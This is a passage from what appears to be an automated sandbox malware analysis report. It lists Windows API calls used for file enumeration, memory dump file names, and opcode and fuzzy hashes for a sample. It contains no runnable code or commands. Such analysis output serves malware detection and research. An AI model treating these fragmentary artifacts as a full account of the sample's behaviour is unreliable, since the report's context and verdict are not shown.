                                • Part of subcall function 00D44910: StrCmpCA.SHLWAPI(?,00D50FDC), ref: 00D44971
                                • Part of subcall function 00D44910: StrCmpCA.SHLWAPI(?,00D50FE0), ref: 00D44987
                                • Part of subcall function 00D44910: FindNextFileA.KERNEL32(000000FF,?), ref: 00D44B7D
                                • Part of subcall function 00D44910: FindClose.KERNEL32(000000FF), ref: 00D44B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: bfdeca920183c7508590d2e13523a352ce13fd56b4b7783b0235e610f31b1fd6
                              • Instruction ID: 7abd70461d1d544a86826db372bc2bc92e33cb0c372b89da0884d4f52500f952
                              • Opcode Fuzzy Hash: bfdeca920183c7508590d2e13523a352ce13fd56b4b7783b0235e610f31b1fd6
                              • Instruction Fuzzy Hash: 0421867A9402086BCB54FBB0DC46EED333CEB98301F004558BA5992181EE749ACC9BB3